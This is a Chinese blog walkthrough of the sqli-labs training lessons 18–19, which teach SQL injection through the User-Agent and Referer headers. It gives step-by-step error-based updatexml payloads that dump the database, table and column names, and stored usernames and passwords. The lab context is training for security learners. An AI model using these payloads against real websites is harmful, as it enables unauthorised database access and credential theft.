(手工)【sqli-labs18-19】Header注入:原理、利用过程

已于 2022-07-10 19:25:37 修改
阅读量532 收藏 3
点赞数 2
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-10 17:04:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125705459
版权

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less18(POST-Header injection -Uagent field -Error based)

2.1、简介:(Header注入)

2.2、第一步:注入点测试

 2.3、第二步:分析过滤

2.4、第三步:暴库

2.5、第四步:爆表名

2.6、第五步:爆字段

2.7、第六步:爆数据

三、Less19(POST-Header injection -Referer field -Error based)

2.1、简介:(Header注入)

推荐:

【SQL注入】UPDATE、insert、delete注入https://blog.csdn.net/qq_53079406/article/details/125670581?spm=1001.2014.3001.5502icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125670581?spm=1001.2014.3001.5502

一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限、过滤

第三步:爆数据库名

第四步:爆表名

第五步:爆字段名

第六步:爆数据

二、Less18(POST-Header injection -Uagent field -Error based)

2.1、简介:(Header注入)

请求方法:POST

方法:Header注入报错回显

2.2、第一步:注入点测试

输入框测试都不存在注入点

 在Header中的User Agent中输入单引号报错

说明存在注入点

且为单引号闭合

 2.3、第二步:分析过滤

对输入框都进行了过滤

接下来:

方法一:获得源码,寻找过滤不严谨的地方

方法二:寻找其他注入点(Header)

2.4、第三步:暴库

' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '

 或者

' and updatexml(1,concat(0x7e,(select database())),1) and '

再或者

',1,updatexml(1,concat(0x7e, database(),0x7e),1))#

2.5、第四步:爆表名

',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

2.6、第五步:爆字段

',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

2.7、第六步:爆数据

',1,updatexml(1,concat(0x7e,(select group_concat(username,'-',password) from security.users),0x7e),1))#

三、Less19(POST-Header injection -Referer field -Error based)

2.1、简介:(Header注入)

请求方法:POST

方法:Header注入报错回显

同Less18,仅字段不同,报错回显

黑色地带(崛起)
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs学习笔记(七)less 18-22 header注入
闵行小鱼塘
09-12 386
继续学习sqli-labs,本篇是less18-22
SQL注入Header注入
秋水的博客
09-01 3869
Header简介 什么是Header头? 通常HTTP消息包括客户机向服务器的请求消息和服务器向客户机的响应消息。这两种类型的消息由一个起始行,一个或者多个头域,一个只是头域结束的空行和可选的消息体组成。HTTP的头域包括通用头,请求头,响应头和实体头四个部分。每个头域由一个域名,冒号(:)和域值三部分组成。域名是大小写无关的,域值前可以添加任何数量的空格符,头域可以被扩展为多行,在每行开始...
post 注入 head 注入 报错注入
weixin_74737710的博客
08-28 67
',(select column_name from information_schema.columns where table_schema=database() and table_name='表名' limit 0,1)),2) 由于正常查询 出现的是表 加上 limit 限制数据只有一条。
sqli-lab-less18
Sa1nZen的博客
08-05 84
sqli-lab-less18
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqlmap header Injection
weixin_33712881的博客
07-28 209
GET /?id=1 HTTP/1.1Host: www.why25.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0x-forwarded-for: 1*(Injection)Accept: text/html,application/xhtml+x...
sqli-labs less 18 POST- Header injections - Uagent field -error based
Monster1m的博客
01-25 201
一、这关提示头部注入。先来看一下源码 1.又出现了check_input函数,说明又开始进行了输入的过滤,先来找找哪些变量用到了这个函数 2.这里发现uname和passwd都进行了过滤,所以不能作为注入点,需要找其他没有被过滤的注入点 3.$_SERVER是一个包含了头信息、路径等的数组,这里直接赋值了agent没有对数据进行检查,下一步就是要找到有没有数据库语句用到这个uagent变量 4.发现这里的插入语句用到了uagent,可以确定在此注入,并且是用单引号闭合 5.这里有有输出数据库错误信息
sqli-labs/less-21;header注入;burpsuite抓包;mysql注入
xiaochenhang的博客
08-18 357
3、这里使用打算使用cookie头注入,因为它页面有cookie回显;看到uname编码方式中有%感觉有点像url;发现提示要使用 ') 进行闭合;2、这里使用burpsuite进行抓包。这里利用报错查询:updatexml。这里选择base64编码;发现是base64编码。1、输入正确账号登陆。...
$_SERVER详解
lky_for_lucky的博客
12-16 1259
Brush $_SERVER详解 $_SERVER[‘HTTP_ACCEPT_LANGUAGE’]//浏览器语言 $_SERVER[‘REMOTE_ADDR’] //当前用户 IP 。 $_SERVER[‘REMOTE_HOST’] //当前用户主机名 $_SERVER[‘REQUEST_URI’] //URL $_SERVER[‘REMOTE_PORT’] //端口。 $_SERVER[‘SERVER_NAME’] //服务器主机的名称。 $_SERVER[‘PHP_SELF’]//正在执行脚本的文件名
sqli-labs(18-22)
ximo的博客
02-03 215
目录Less-18Less-19Less-20Less-21Less-22 Less-18 输入正确的用户名(admin),密码(admin),登录成功,并返回User-Agent信息: 根据关卡描述,也知道其为User-Agent头注入;这里使用火狐浏览器的插件(Modify Headers),或者burp suite抓包进行User-Agent头注入。 根据上图的sql语句信息,发现分别返回User-Agent、IP地址和username, 所以我们在构造sql语句时,需要满足三个注入信息,这里我们
Header:请求头参数详解
panying1的博客
12-08 2557
Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accept-Charset: iso-8859-5 Accept-Encoding 指定浏览器可以支持的web服务器返回内
掌控安全 -- header注入
qq_51802152的博客
12-04 2345
HEADER注入
最受欢迎的十款SQL注入工具
最新发布
2302_76672693的博客
12-18 1499
最受欢迎的十款SQL注入工具
sqli-labs注入靶场搭建
09-25
sqli-labs是一个用来学习sql注入的环境。搭建sqli-labs注入靶场可以按照以下步骤进行操作: 1. 准备软件:首先,你需要准备一个支持PHP和MySQL的服务器环境,例如Apache服务器、PHP解释器和MySQL数据库。 2. 下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值